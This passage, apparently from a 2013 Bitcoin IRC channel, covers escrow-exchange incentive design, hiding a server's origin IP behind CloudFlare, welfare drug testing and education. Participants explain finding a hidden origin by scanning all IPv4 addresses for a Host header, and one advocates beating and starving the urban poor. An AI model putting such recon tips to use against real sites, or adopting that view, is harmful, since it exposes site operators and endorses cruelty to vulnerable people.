gives people perverse incentives. Apr 25 20:00:50 how so? Apr 25 20:00:56 i thought about giving it to charity also Apr 25 20:00:58 in your model (active logins) : suppose you have 100 users. i make 9900 spam accounts and log them in daily. Apr 25 20:01:03 but then it gives them bad incentie Apr 25 20:01:07 if i scam someone i get ~99% of the funds ? Apr 25 20:01:16 yup, you're right Apr 25 20:01:20 didn't think about that Apr 25 20:01:24 guess i won't be doing that Apr 25 20:01:27 yeah. Apr 25 20:01:32 thanks! Apr 25 20:01:36 the volume one is very bad but slightly less bad than the active logins Apr 25 20:01:53 volume one doesn't sound bad Apr 25 20:01:53 asciilifeform's solution is arguably better than both Apr 25 20:02:05 even if it is still very bad i think (because bitcoin destruction is bad imo) Apr 25 20:02:15 yeah but really destroying money? Apr 25 20:02:20 ikr. Apr 25 20:02:40 still,think : in the volume approach, i can wash trade myself into the 99% position. Apr 25 20:02:51 i could do like a pick your own charity also Apr 25 20:02:52 heh Apr 25 20:03:19 o i got an idea : Apr 25 20:03:24 what? Apr 25 20:03:26 send it to s.dice. Apr 25 20:03:32 if you win then you have enough money to repay both Apr 25 20:03:36 ipo and release that as dividends. Apr 25 20:03:38 if you lose, fuck them, do better next time Apr 25 20:03:54 or that, yeah, maybe. bitbet is doing something similar for bad bets. Apr 25 20:04:04 mircea_popescu: this just shifts the moral hazard to the SDICE people. Apr 25 20:04:10 asciilifeform how ? Apr 25 20:04:34 that's giving sdice bad incentive to do odd things on nashx Apr 25 20:04:37 mircea_popescu: now if I run SDICE, I have the incentive to siphon BTC by triggering "destruciton." Apr 25 20:04:44 *destruction Apr 25 20:04:48 asciilifeform why, for the 1.9% margin ?! Apr 25 20:04:59 yes. free money is free money. Apr 25 20:05:04 maybe you're right. Apr 25 20:05:11 well fuck lol Apr 25 20:05:19 i never thought we'd have the problem of what to do with moneyz Apr 25 20:05:26 well i think my margin would be higher than that Apr 25 20:05:35 if the bet wins, it comes back to me right? Apr 25 20:05:41 seongyupyoo s.dice takes 1.9% of bets is what i mean. Apr 25 20:05:46 so i would have incentive to try to increase destruction Apr 25 20:05:52 yes, say two people each put 1 btc in. they destrouy Apr 25 20:05:59 you send 2 btc to sdice, get 4 or w/e Apr 25 20:06:10 Shitcoin wins, because everything is 100% voluntary. You don't even see the burned coin as burned if you don't use it. Apr 25 20:06:11 and you use that 4 to split among them Apr 25 20:06:24 lol Apr 25 20:06:31 (because now they both have the original results they wanted) Apr 25 20:06:41 ahhh.... Apr 25 20:07:00 sorta like "Saved by god" Apr 25 20:07:05 interesting... so that would drive scammers to scam more for a chance to undo their scam for free Apr 25 20:07:14 hm... fuck. Apr 25 20:07:28 no wait. Apr 25 20:07:38 that's not a problem. scammers are already 100% driven to scam 100% what they can Apr 25 20:07:54 not like there's a scammer anywhere going "o, you know what, let's just do 50% of scamming" Apr 25 20:08:09 maybe it could temp regular folks to take the money and run a little more? Apr 25 20:08:24 [BTCTC] [ASICMINER-PT] 2 @ 1.1647 = 2.3294 BTC [+] Apr 25 20:08:31 i guess that's possible tho. Apr 25 20:08:34 it's definitely interesting idea i'll keep in mind, so far one of the best and most unique Apr 25 20:08:35 you might as well suggest that banks should play in casinos to recoup bad debts. it is nonsense to use SDICE as part of any kind of rational system (other than a chump harvester, of course.) Apr 25 20:08:55 asciilifeform but this is the irrational part of reason : disposing of "bad". Apr 25 20:09:09 like, putting peiople in jail. this is jailed money as it were. Apr 25 20:09:20 mircea_popescu: it isn't disposal if you give it to a third party. Apr 25 20:09:29 these are very interesting questions... banks playing in casinos lol Apr 25 20:09:31 my original inspiration was purely greek. Apr 25 20:09:33 see this: http://www.nytimes.com/2009/02/13/us/13judge.html?pagewanted=all&_r=0 Apr 25 20:09:38 you'd have a "gods call it" tyope of thing Apr 25 20:09:52 but i think it's fully argued, i don't see anything more for it than what;s been said. Apr 25 20:10:02 fines have to go to /dev/null to be truly fair Apr 25 20:10:19 you're just a humourless protestant that's why you think so :D Apr 25 20:10:31 seongyupyoo why you say people woudln't use this for 100 btc ? Apr 25 20:10:43 is there no party who can take this money and not be incentivized to do bad? Apr 25 20:10:54 funny that, I'm an ethnic atheist. but I do see the spice and humour in "trial by combat." Apr 25 20:10:59 seongyupyoo btc is pseudonymous, remember ? Apr 25 20:11:03 i was thinking of scamming but only wanted to do 50% of my possible scamming Apr 25 20:11:18 well, if you want to make 1 transaction of size 100, then you need to be risking about 200 btc Apr 25 20:11:23 as opposed to Apr 25 20:11:33 someone just dropped 192 BTC on litecoins Apr 25 20:11:34 if you're making 100 transactions of 1, then you only need to be risking 2btc Apr 25 20:11:42 seongyupyoo: /dev/null is a perfectly disinterested third party who will never do you ill. Apr 25 20:11:44 ya, and i'll be managing 100 txs x.x Apr 25 20:12:32 i like systems based on mutually assured destruction Apr 25 20:12:41 anyway, the wrap-up for me seongyupyoo : it's certainly an interesting concept. it brings however very deep philosophical questions to the fore. impossible to know if it'll acrtually be a productive business at this point Apr 25 20:12:41 yeah that's another thing i have to think about also Apr 25 20:12:42 his inspiration was mexican standoffs in movies LOL Apr 25 20:12:54 so something worth doing with your time if you're in a research mood. if you're in bread earner mood dunno. Apr 25 20:12:59 yes, it is interesting from a theoretical standpoint Apr 25 20:13:49 other thing is that a scheme like this has to rely on an open/verifiable crypto-contract protocol, rather than some guy's phone app Apr 25 20:14:03 i think that's not so hard to do tho. Apr 25 20:14:09 m/n keys etc. Apr 25 20:14:25 well that's been brought up a lot on reddit, but issue is Apr 25 20:14:33 yeah, is bitcoinity working correctly for everyone? Apr 25 20:14:41 ;;ticker Apr 25 20:14:42 BTCUSD ticker | Best bid: 154.03650, Best ask: 155.00000, Bid-ask spread: 0.96350, Last trade: 154.03649, 24 hour volume: 122998.14095664, 24 hour low: 140.96635, 24 hour high: 162.00000, 24 hour vwap: 152.51401 Apr 25 20:14:45 seongyupyoo: what's the advantage of your scheme vs. Shitcoin, in your view? Apr 25 20:14:55 i see it. Apr 25 20:14:57 if you start getting in the middle of transactions between traders, it starts becoming really difficult when you try to get in the middle of the USD transactions Apr 25 20:15:08 asciilifeform i confess not knowing wtf shitcoin is or how it works. Apr 25 20:15:19 i don't know shitcoin Apr 25 20:15:27 Shitcoin: http://www.loper-os.org/?p=988 Apr 25 20:15:29 his exchange seems to be based on a ltc to btc model...which could work if i didn't find ltc useless Apr 25 20:15:36 seongyupyoo that is a big problem. i imagined you'd only allow people risk btc, and so your service couldn't be used for 1st time btc buyers Apr 25 20:16:02 [MPEX] [S.MPOE] 17650 @ 0.00069521 = 12.2705 BTC [+] Apr 25 20:16:05 Shitcoin was my own modest proposal for MAD/Nash equilibrium reputation management/bonds Apr 25 20:16:11 well i'm not sure what you're saying Apr 25 20:16:21 NashX doesn't answer any transactions Apr 25 20:16:25 just the risks Apr 25 20:16:25 "to collectively specify the least-significant digits of the total amount" ahahaha ok mpex lives! Apr 25 20:16:26 (10:11) < KRS-1> someone just dropped 192 BTC on litecoins << o.O Apr 25 20:16:30 haha wow Apr 25 20:16:48 I wrote that before I was told of mpex (and before I was really 100% clear on how the BTC protocol works.) Apr 25 20:16:49 so once a deal is made between two parties, it's completely up to them to do whatever they need to do to make their deal Apr 25 20:17:59 One potential problem with the scheme is that innocent receivers of bonded bitcoins would suffer if the shitcoins attached to said bitcoins are invoked at a later time. The obvious countermeasure is for would-be receivers of a particular bitcoin to check (using automated means, of course) whether an unexpired Shitcoin bond is attached to these coins at the particular time they are about to receive them. Apr 25 20:18:06 this is bad tho. you can't refuse a tx. Apr 25 20:18:18 sure you can. bitbet does all the time (send it back.) Apr 25 20:18:40 bitcoin isn't universally compatible with this sendfback thing tho Apr 25 20:18:45 but maybe Apr 25 20:19:05 i have no idea what shitcoin getting attached to a bitcoin means Apr 25 20:19:08 also, since you can have infinitely-many addresses, being sent shat-on coins doesn't hurt you (you will need to come up with clean ones to post a bond, but for other purposes dirty ones will do fine) Apr 25 20:19:08 i know it'd piss me off if i had to check all incoming mpex funds for this tho Apr 25 20:19:20 ^^^ Apr 25 20:19:40 clean coins can be thought of as "eating sardines" Apr 25 20:19:43 seongyupyoo http://www.loper-os.org/?p=988 we were discussing that Apr 25 20:20:23 the best part is that shitcoin can't do anything whatsoever to you if you don't use it. Apr 25 20:20:41 you can simply carry on pretending it doesn't exist (of course, at present it doesn't exist at all, and isn't likely to) Apr 25 20:21:35 with nashx, the main problem is just deciding how to handle "destroyed" btc, is that right? Apr 25 20:21:35 taint is an interesting idea Apr 25 20:21:55 ThickAsThieves: he said for now he keeps them, since he doesn't see that happening Apr 25 20:22:05 surely itll happen Apr 25 20:22:08 but he would implement a distribution system if it turned out to be a problem Apr 25 20:22:19 equally pay out all participants i guess Apr 25 20:22:42 could there be tx fees that were somehow porportionate to the amount of destroyed btc? Apr 25 20:22:47 shitcoin sounds like an overall bad idea... not sure what purpose it serves to have metadata on how dirty a coin is, an dwhat makes it dirty and who decides Apr 25 20:22:57 to create a balance without incentive to game it Apr 25 20:23:03 the point of metadata is that you can ignore it... Apr 25 20:23:18 if you don't want to participate in the system, it doesn't matter to you Apr 25 20:23:28 so since its voluntary, all the best, have fun Apr 25 20:23:41 [BTCTC] [ASICMINER-PT] 1 @ 1.125467 BTC [-] Apr 25 20:23:52 i see, but still out of curious what purpose does it serve? Apr 25 20:24:11 serves to distract us from nashx Apr 25 20:24:13 ;) Apr 25 20:24:21 trying to make coins which are used illicitly be tracked Apr 25 20:24:23 yes two problem i see with nashx now is destroyed coins Apr 25 20:24:32 for example, pirate's coins would probably not be spendable Apr 25 20:24:35 under that system Apr 25 20:24:37 and how to handle big transactions or allow many quick small transactions Apr 25 20:24:59 seongyupyoo: he doesn't actually destroy them Apr 25 20:25:06 can large tx initiate large, but resolve in chunks? Apr 25 20:25:08 he just doesn't give them to the people actually wanting them Apr 25 20:25:12 mircea_popescu: hahaha. I'm sick of the retards. Apr 25 20:25:57 you have to destroy coins for real (that is, threaten to) to punish without creating perverse incentive for the party triggering the punishment. Apr 25 20:26:08 i personally like bitcoin just the way it is, i haven't seen another system which brings anything valuable to the table in my opinino Apr 25 20:26:16 i hate the idea of coin 'taint' Apr 25 20:26:24 what if you donate the destroyed coins as TX fees into blockchain Apr 25 20:26:26 asciilifeform: "destroy" "me not get" same difference Apr 25 20:26:47 his plan was to give it to market participants Apr 25 20:26:49 yes, that would still mean they each have to make many transactions Apr 25 20:26:51 dividend of sorts Apr 25 20:26:57 what if you donate the destroyed coins as TX fees into blockchain << this may work Apr 25 20:27:02 because transactions are done by the traders themselves, not by nashx Apr 25 20:27:08 it will be difficulty to argue that miners are extra incentivised thus Apr 25 20:27:11 ok...and whichever coins you want to lose, you can just lose? Apr 25 20:27:26 :) Apr 25 20:27:37 that would work Apr 25 20:27:51 kind of still similar to putting it in blackhole Apr 25 20:28:03 except it gets redist at least Apr 25 20:28:08 yup Apr 25 20:28:11 so it is better Apr 25 20:28:12 it gets redist right now... Apr 25 20:28:13 basically you are giving them to pool ops Apr 25 20:28:19 most ops take those fees in the pocket Apr 25 20:28:23 i think that may be the answer Apr 25 20:28:25 ^^ true Apr 25 20:28:47 hmm.. Apr 25 20:28:51 kako that is a pool problem Apr 25 20:28:54 not a nashx problem Apr 25 20:28:55 i think the major problem with all these decentralized exchange ideas is that they have no concept of fiat money, and do nothing to solve that problem Apr 25 20:29:11 still pool ops are incentivized to destroy Apr 25 20:29:17 yes, but Apr 25 20:29:23 ThickAsThieves its nashxes since it cant be used as solution Apr 25 20:29:29 that is why its best to distribute to people who are using nashX Apr 25 20:29:33 if there is great incentive for tx fees Apr 25 20:29:38 then a pool that shares them will win Apr 25 20:29:41 what do you mean no concept of fiat money? Apr 25 20:29:55 how do i do a p2p transfer of $155? Apr 25 20:30:01 [HAVELOCK] [VTX] 11 @ 0.4551 = 5.0061 BTC [-] Apr 25 20:30:15 i want to trade! i will roll up the bills and push them through ethernet? Apr 25 20:30:21 i didnt even know most pools dont share tx fees, is that true?! Apr 25 20:30:32 how to distribute among nashx traders is another issue,,, like it was brought up before people can make fake accounts and many face transactions Apr 25 20:30:42 no im just making shit up as i go Apr 25 20:30:50 lol kakobrekla Apr 25 20:30:51 that sounds about right that pool ops wouldn't share Apr 25 20:31:04 surely there are pools that do Apr 25 20:31:06 you can look up a spreadsheet that tells you each pool's rules...also, who cares Apr 25 20:31:24 also, the coins dist by donated tx fees could easily be spread out thin Apr 25 20:31:39 and over time Apr 25 20:31:39 that solves the problem! not. Apr 25 20:32:00 even if pool ops gain, they have no way to game it Apr 25 20:32:14 are there not pools that share collected tx fees? Apr 25 20:32:30 the entire idea is only interesting as a theoretical philosophical exercise Apr 25 20:32:45 so what is this chat room Apr 25 20:32:53 i dunno, i'm all for a distributed exchange Apr 25 20:32:53 how many people here actively? Apr 25 20:33:05 maybe 15-25 are active Apr 25 20:33:07 philosophical masturbation seongyupyoo sometimes even physical Apr 25 20:33:13 yeah i'd like to see a distributed exchange also Apr 25 20:33:48 http://trilema.com/2013/regarding-money/ < if anyone feels like a read Apr 25 20:34:00 [HAVELOCK] [VTX] 1 @ 0.455 BTC [-] Apr 25 20:34:45 anyways, i enjoyed chatting with you guys Apr 25 20:35:01 i will come back if i ever have any questions Apr 25 20:35:09 seongyupyoo don't listen to kakobrekla and trolls Apr 25 20:35:13 this is the place for bitcoin biz. Apr 25 20:35:48 lol Apr 25 20:35:55 does red mean private message? Apr 25 20:36:15 no, you were highlighted Apr 25 20:36:18 anyways take care Apr 25 20:36:19 if someone says your name. Apr 25 20:36:23 oh i see Apr 25 20:36:26 great article...think the same thing as far as its all about the value Apr 25 20:36:28 not the money Apr 25 20:36:34 total money = total value Apr 25 20:36:46 but why should these be distinct ? Apr 25 20:36:47 anyways, lunch time, cya later Apr 25 20:36:53 mircea_popescu: they are one and the same Apr 25 20:36:57 im going to cook! so... later. Apr 25 20:37:12 currency is shifting, "money" is 100% of value...semantics i suppose Apr 25 20:37:47 but yeah, how much of the value of the world do you have under your control = making it rain on bitches or not Apr 25 20:43:01 [HAVELOCK] [VTX] 17 @ 0.4055 = 6.8935 BTC [-] Apr 25 20:47:41 War starting to rage over bitcoin price. Apr 25 20:47:57 starting? Apr 25 20:48:09 toche. Apr 25 20:48:17 Perhaps I meant a little battle. Apr 25 20:49:02 mircea_popescu: i saw that 'dawn' deleted all those tweets. glad you followed it up with this: http://trilema.com/2013/fire-in-alabama-lets-make-the-most-of-it/ Apr 25 20:50:00 [HAVELOCK] [HIM] 1 @ 1.7999 BTC [-] Apr 25 20:52:17 jeeze people over here are just a bunch of fake-it-till-you-make-it phonies Apr 25 20:52:26 https://twitter.com/BFL_News Apr 25 20:52:37 BFL sends a demo unit to Wired Apr 25 20:52:37 well, at least these people in the MSM certainly all seem to be Apr 25 20:52:48 so, question - my webserver ie behind cloudflare, but it sends emails, the receiving SMTP server adds a "received from:" header to the message, revealign the IP of my server.. Apr 25 20:52:58 assholes Apr 25 20:53:03 whats the solution to this? dont send emails? lol. Apr 25 20:53:42 dont send emails from your server? Apr 25 20:54:22 topace: I can still find your ip Apr 25 20:54:30 scrat yea probably Apr 25 20:54:40 dmca request? Apr 25 20:54:42 (not with a fake dmca) Apr 25 20:54:57 hrm Apr 25 20:55:13 Scrat: pelase let me know my IP, im changing it soon as i get the email thing figured out www.havelockinvestments.com Apr 25 20:56:10 you can query all 4 billion IPs on port 80 within a day Apr 25 20:56:32 one of them will present a http 200 for the host header havelockinvestments.com Apr 25 20:56:45 ahh Apr 25 20:56:52 i guess thats one way Apr 25 20:56:56 heh Apr 25 20:57:26 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [-] Apr 25 21:00:48 mod6 was funny lol. she beleeeted it!!1 Apr 25 21:01:31 akamai can setup a custom X-Header so you know it's them, you check for it and show vhost not found if it's not them Apr 25 21:01:42 haha! i'm getting so sick of these clowns Apr 25 21:01:42 no idea if cloudflare does that Apr 25 21:03:46 heh, check ou this spike http://bitcoin.clarkmoody.com/ Apr 25 21:03:47 BFL sends a demo unit to Wired did wired say anything yet ? Apr 25 21:04:11 topace ouch. that';s no good. Apr 25 21:04:15 wired tweeted the delivery Apr 25 21:04:42 ThickAsThieves: sponsored by jesus himself Apr 25 21:04:47 Scrat try this on mpex ? Apr 25 21:06:03 i should have clarified to look at the M1 chart to see the spike Apr 25 21:06:03 mircea_popescu: are you implying that it doesn't work? it can be avoided however if reverse proxies have set IPs and your webservers whitelist said IPs Apr 25 21:06:26 im just curious. Apr 25 21:06:31 no anti-ddos service has set IPs, they juggle them around, nullroute them ,etc Apr 25 21:06:58 takes a few ec2 machines to do it in a few hours, at a minimal cost Apr 25 21:07:02 actually, simply setting Allow from IP's in apache should fix that problem scrat Apr 25 21:07:14 so apache wont reply to any host thats not cloudflare Apr 25 21:07:17 i'll save you the 4bn lookups : mpex.co. 474 IN A 174.127.72.233 Apr 25 21:07:24 could even firewall out all other IP's Apr 25 21:07:36 topace: here's the problem, they don't have set IPs Apr 25 21:07:39 yes they do Apr 25 21:07:48 https://www.cloudflare.com/ips Apr 25 21:07:49 they change netblocks Apr 25 21:08:19 how often does that list change Apr 25 21:08:28 very little from what i can tell Apr 25 21:08:32 im sure they add/remove occasionally Apr 25 21:09:05 the ips are in your spf record Apr 25 21:09:18 ll: only if you put them there Apr 25 21:09:48 ill obviously be removing them when i switch IP's Apr 25 21:09:55 and leaving it as just the mail server im sending out from Apr 25 21:10:09 but i still need a way for tha tmail server not to add a "Received from:" header Apr 25 21:10:32 topace: would be a good idea then (to whitelist these blocks) Apr 25 21:11:25 can get it from your dns servers too Apr 25 21:12:16 ll: nope, dns is cloudflare Apr 25 21:12:41 no, your dns server Apr 25 21:12:44 dig havelockinvestments.com @ns1.lightbox.org Apr 25 21:14:13 heh, forgot to deconfigure that Apr 25 21:14:15 its gone now, try again Apr 25 21:14:46 yep Apr 25 21:14:53 [BTCTC] [ASICMINER-PT] 1 @ 1.125038 BTC [-] Apr 25 21:15:01 [BTCTC] [ASICMINER-PT] 2 @ 1.125037 = 2.2501 BTC [-] Apr 25 21:15:05 [BTCTC] [ASICMINER-PT] 1 @ 1.125036 BTC [-] Apr 25 21:15:08 [BTCTC] [ASICMINER-PT] 1 @ 1.12501 BTC [-] Apr 25 21:15:16 [BTCTC] [ASICMINER-PT] 8 @ 1.125 = 9 BTC [-] Apr 25 21:15:18 [BTCTC] [ASICMINER-PT] 1 @ 1.123011 BTC [-] Apr 25 21:15:22 so i can deal with a bruteforce scan of the entire ip4 range on port 80, by whitelisting/firewalling the cloudflare IP's Apr 25 21:16:18 but i still dont know what to do with the damn "received from" header Apr 25 21:16:18 i guess insert emails to send into a database, and have another server pull them out and send the mail from there Apr 25 21:16:56 what do you use to send emails Apr 25 21:17:10 is the smtp server yours? Apr 25 21:17:32 yes, i would send through my business mail server (mail.lightbox.org) Apr 25 21:17:58 [MPEX] [S.MPOE] 4100 @ 0.00069521 = 2.8504 BTC [+] Apr 25 21:18:00 [MPEX] [S.MPOE] 21050 @ 0.0006973 = 14.6782 BTC [+] Apr 25 21:18:18 managed email delivery isn't such a bad idea Apr 25 21:18:26 sendgrid, postmark, whatever Apr 25 21:20:31 also, prettu sure most SMTPd's can remove the from IP Apr 25 21:20:37 i know postfix can Apr 25 21:21:55 hmmm i use postfix Apr 25 21:22:12 even better, point it to wh Apr 25 21:23:13 wh? Apr 25 21:23:17 even better, have a stunnel on the smtp machine that points to it Apr 25 21:23:34 encrypted sending :) Apr 25 21:23:38 (useless but meh) Apr 25 21:23:39 stunnel nice Apr 25 21:24:11 lol Apr 25 21:24:13 i like pgp plus stunnel... Apr 25 21:24:28 pgp is more important, but i think stunnel is good protection from ddos Apr 25 21:36:38 mircea_popescu I just realized you can use options as real insurance Apr 25 21:37:13 slowpoke meme Apr 25 21:46:08 [BTCTC] [ASICMINER-PT] 1 @ 1.12201 BTC [-] Apr 25 21:46:17 [BTCTC] [ASICMINER-PT] 1 @ 1.122 BTC [-] Apr 25 21:46:21 [BTCTC] [ASICMINER-PT] 1 @ 1.1151 BTC [-] Apr 25 21:46:25 [BTCTC] [ASICMINER-PT] 1 @ 1.11 BTC [-] Apr 25 21:46:28 [BTCTC] [ASICMINER-PT] 5 @ 1.11 = 5.55 BTC [-] Apr 25 21:46:31 [BTCTC] [ASICMINER-PT] 5 @ 1.106 = 5.53 BTC [-] Apr 25 21:52:09 whats up with the OIX? Apr 25 21:52:32 no options bought or sold Apr 25 21:52:40 and today is options expiration Apr 25 21:52:46 err tomorrow. Apr 25 21:54:10 my guess is that the OIX return to its normal state of tracking pricing via options once the book rolls over for next month. every since the correction on the 10th it's been pretty minimal for options. Apr 25 21:56:10 i dunno. *shrug* Apr 25 21:57:34 $vwap ^OIX Apr 25 21:57:35 mod6: ^OIX 1 day: no data 7 day: no data 30 day: no data Apr 25 22:01:46 gribble always amazes me Apr 25 22:01:47 [15:00] <+Rav3n> ;;8ball am i screwed? Apr 25 22:01:47 [15:00] The outlook is poor. Apr 25 22:01:47 [15:01] <+Rav3n> ;;8ball does that mean I'm gonna lose big time? Apr 25 22:01:47 [15:01] It is so. Apr 25 22:01:47 [15:01] <+Rav3n> fuck Apr 25 22:03:16 ;;nethash Apr 25 22:03:17 73122.7340805 Apr 25 22:05:24 reading it all up... i thing i got a plan to boycott mpex. Apr 25 22:06:09 CoinBr is boycotting racist exchange!!! Apr 25 22:06:21 (*)Balances will not be refunded. Apr 25 22:06:38 i like that plan, what do you say? Apr 25 22:08:50 heheh. i just smh at stuff I read on btctalk Apr 25 22:09:12 most of it anyway Apr 25 22:10:51 mod6 quite likely. Apr 25 22:11:46 also pls don't boycott mpex Apr 25 22:12:00 every time you boycott mpex I whip a kitten. Apr 25 22:12:07 haha Apr 25 22:13:13 mine are freshly shaved Apr 25 22:14:03 http://reason.com/archives/2005/08/01/who-killed-paypal/print Apr 25 22:14:06 this is a good lol. Apr 25 22:16:05 is there a way to short bitcoins? Apr 25 22:16:31 while one Silicon Valley lawyer wrote in the California legal publication The Recorder that PayPal was an ideal money laundering mechanism for "drug dealers and domestic terrorists," Apr 25 22:16:45 jimbo2k you can buy puts/sell calls short on mpex. Apr 25 22:30:40 seongyupyoo, what about sending the btc to *minable* blackhole and publish the challenge? Apr 25 22:31:04 oh hes away Apr 25 22:31:30 interesting stuff happens when i;m not around, as always Apr 25 22:31:42 go away Apr 25 22:31:50 joke Apr 25 22:31:55 (jurov) Apr 25 22:32:08 fyi that is a hug. Apr 25 22:32:12 mp I am interested to know what you think about Gov Rick Scott, FL, wanting welfare recipients to take and pass drug tests to qualify Apr 25 22:43:35 [BTCTC] [ASICMINER-PT] 1 @ 1.178799 BTC [+] Apr 25 22:45:14 ThickAsThieves: YES, i am curious too Apr 25 22:45:19 ;;goxlag Apr 25 22:45:20 MtGox lag is 0.517559 seconds. During this time, light travels 0.00103718244112 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 25 22:45:36 but, if i had to guess, why are we giving them anything drug test or not...do drugs all you want and support yourself... Apr 25 22:46:03 however, i think that they should do this to any ceo or board member of a company that needs a bailout Apr 25 22:46:23 since they will also be accepting public assistance, we want to make sure they won't spend it on drugs! Apr 25 22:46:59 i cant pinpoint why i dont like perfectly Apr 25 22:47:05 it just seems like mixing issues to me Apr 25 22:47:11 jurov: that is a great idea...i like the idea of remining coins Apr 25 22:47:57 ThickAsThieves: i think its abhorrent, but most people would say that the issue is not drugs but rather welfare...that is where the issues mix, what does drugs have to do with welfare? (you could argue that one leads to the other, but i think that is a simplistic, facile argument) Apr 25 22:49:00 and where do you draw the line? Apr 25 22:49:13 if they gain 40lbs do they lose welfare? Apr 25 22:49:14 as soon as you want to assess welfare recipient eligibility, you sow the seeds of potentially unbounded bureaucracy Apr 25 22:49:32 so let's have equal minimal income, or no welfare at all Apr 25 22:50:06 if they get a parking ticket do they lose welfare? Apr 25 22:50:15 its too much like parenting or something Apr 25 22:53:09 [MPEX] [S.MPOE] 9157 @ 0.00069843 = 6.3955 BTC [+] Apr 25 22:53:10 jurov: that's about the best way to look at it, the muddy middleground always ends up bad Apr 25 22:56:40 topace, amazon offers SES service for email where any received from: headers are all unroutable private IPs Apr 25 22:56:59 i plan to use it Apr 25 22:59:31 and the port 80 problem can be solver by using another port and telling cloudflare to use it Apr 25 23:00:32 increases portscan complexity 65000x Apr 25 23:00:48 The proposal to test welfare recipients for drugs reminds me of: Apr 25 23:00:58 omg, i was only admin for 7 years in a little company Apr 25 23:01:05 " It is a curious fact that in America public assistance is only made available to the miserable and the downtrodden, not to those who are in need of some free money but are otherwise perfectly content. Although it is just as possible to be poor and happy in America as anywhere else, here one must make a choice: to avoid any number of unpleasant situations, one must be careful to hide either the fact that one is Apr 25 23:01:05 poor, or the fact that one is happy." Apr 25 23:01:10 (http://cluborlov.blogspot.com/2010/08/miserable-pursuits.html) Apr 25 23:01:21 don't tell me nobody other can think about such things???? Apr 25 23:03:09 perhaps everyone aho should be thinking about practical security is jerking off about taxes and welfare??? Apr 25 23:03:10 http://www.businessinsider.com/canadian-banks-closing-bitcoin-businesses-2013-4 Apr 25 23:03:46 like yesterday. i had nice talk about how to be safe in bitcoinland and about all the heists Apr 25 23:04:07 !sell vtx -all Apr 25 23:04:10 but had to wait for libertard who expounded for hour and a half Apr 25 23:04:13 ThickAsThieves well... i don't have an opinion. Apr 25 23:04:20 and drove half of audience away Apr 25 23:04:33 /rant Apr 25 23:04:58 jurov was this your conference thing you were going to ? Apr 25 23:05:57 it was this: https://www.progressbar.sk/calendar/bitcoinove-trhy bitcoin markets for newbs Apr 25 23:06:08 aha Apr 25 23:07:39 asciilifeform dunno about that theory rly. burning man is all about showing off how poor and happy you are Apr 25 23:07:42 chicks apparently dig it. Apr 25 23:08:37 you dont have an opinion? Apr 25 23:08:43 really? Apr 25 23:08:47 mircea_popescu: burning man is full of "marie antoinette poor", not actual poor. Apr 25 23:08:56 nevertheless. Apr 25 23:09:04 ThickAsThieves well yes. Apr 25 23:09:15 how about a anthropological or philosophical perspective then Apr 25 23:09:18 mircea_popescu: the difference matters. Apr 25 23:09:38 it's catch-22. allowing idiots to use drugs is certainly going to lead to this business-enforced drug policy. because it's cheaper to pay crackheads and who the fuck cares they die in five years, all the better. Apr 25 23:09:44 disalowing it is too much like parenting. Apr 25 23:10:19 i also find it to be in contrast to the current republican agenda Apr 25 23:10:29 gov is telling people how to live Apr 25 23:10:40 i guess they hate gays too... Apr 25 23:10:42 mircea_popescu: nobody would bother testing the poor for drugs if they didn't need to work. Apr 25 23:10:43 here's the thing : there's always going to be a class of people who need to be told how to live. Apr 25 23:10:53 be it roman empire slaves or contemporary us social media crowds, Apr 25 23:10:55 it's a fact. Apr 25 23:11:00 mircea_popescu: Aristotle's natural slaves? Apr 25 23:11:12 is that a need or a preference? Apr 25 23:11:20 asciilifeform they only test them at the workplace cause that's the food dispenser. Apr 25 23:11:28 ThickAsThieves it's simple inability. Apr 25 23:11:47 motherfucker. got a new camera, has EVEN SMALLER USB Apr 25 23:11:52 (re: slaves: http://unqualified-reservations.blogspot.com/2013/03/sam-altman-is-not-blithering-idiot.html) Apr 25 23:12:16 aha! at least they include cable. way to go sony. Apr 25 23:12:33 asciilifeform hmm... i think i wrote an article about altman recently Apr 25 23:12:39 now we're gonna get even more MP self-shots Apr 25 23:12:42 what, is the modlbug reading me ?! Apr 25 23:13:01 drug testing is a multibillion-dollar business in the U.S.; arguably it is the employers who are the chumps here (they are bamboozled into thinking that it matters whether the fry cook smokes dope.) Apr 25 23:13:15 can we get a picture of you taking a picture of you taking a picture of yourself? Apr 25 23:13:29 asciilifeform the us employers are forced into being a sort of government subsidiary. Apr 25 23:13:40 they implement govt policy, handle the herd, get some trimmings. Apr 25 23:14:05 god forbid they put the money into improving education Apr 25 23:14:26 AFAIK testing mcdonalds cooks isn't mandatory (vs. truck drivers etc) Apr 25 23:16:28 mircea_popescu: altman is an infamous social butterfly / master investor milker. most of his success is from being chums with paul graham. Apr 25 23:17:21 aka the freakshow. Apr 25 23:17:33 ThickAsThieves education can not be improved with money. Apr 25 23:17:43 the only way to do it is if you take the urban poor, beat them and starve them. Apr 25 23:17:52 that doesn't take money, that takes the will to do so. Apr 25 23:18:54 mircea_popescu does any research at least marginally confirm this? Apr 25 23:19:06 yes, my own. Apr 25 23:19:13 afaik nobody has done research on beating people. Apr 25 23:19:23 i am skeptical the money cannot be used to improve american education Apr 25 23:19:25 no, but they did on literacy/math skills Apr 25 23:19:36 there are many ways to throw money at education the dont work Apr 25 23:19:44 that doesnt mean it cant be done Apr 25 23:19:49 and it isn't so much about money. but not about beating, either. Apr 25 23:19:51 listen, it's very simple. kid today as 5000 years ago has to answer a simple question : why the fuck am i learning all this ? Apr 25 23:20:03 "because if you don't i'll fucking beat you to death" is an excellent answer. Apr 25 23:20:06 find another. Apr 25 23:20:15 so the money goes to determining better ways and things to educate Apr 25 23:20:28 the urban poor are a tremendous profit making engine for various industries (e.g. pharma: http://partialobjects.com/2011/06/staggering-thought-of-the-day/) into which oceans of money are funneled through them. Apr 25 23:20:42 when i was in school i was smart enough to know i was not being taught the way that suited me Apr 25 23:20:56 the way we teach is not optimal at all Apr 25 23:21:06 that's the point of teaching Apr 25 23:21:08 to change you. Apr 25 23:21:19 some teachers reached me Apr 25 23:21:22 others annoyed me Apr 25 23:21:27 until you're optimal for it. not the other fucking way around. Apr 25 23:22:01 also, we already require too much parenting by teachers Apr 25 23:22:06 now you wanna beat the kids Apr 25 23:22:24 there certainly is research about punishment to performance. on better statistical sample than mircea's Apr 25 23:22:37 any system of organizing society (education, work, whatever) that doesn't include a hard mechanism for separating actual people from meat puppets is doomed. Apr 25 23:22:47 its not hard to prove that beating someone gets them to do what you want... Apr 25 23:22:52 stats not needed Apr 25 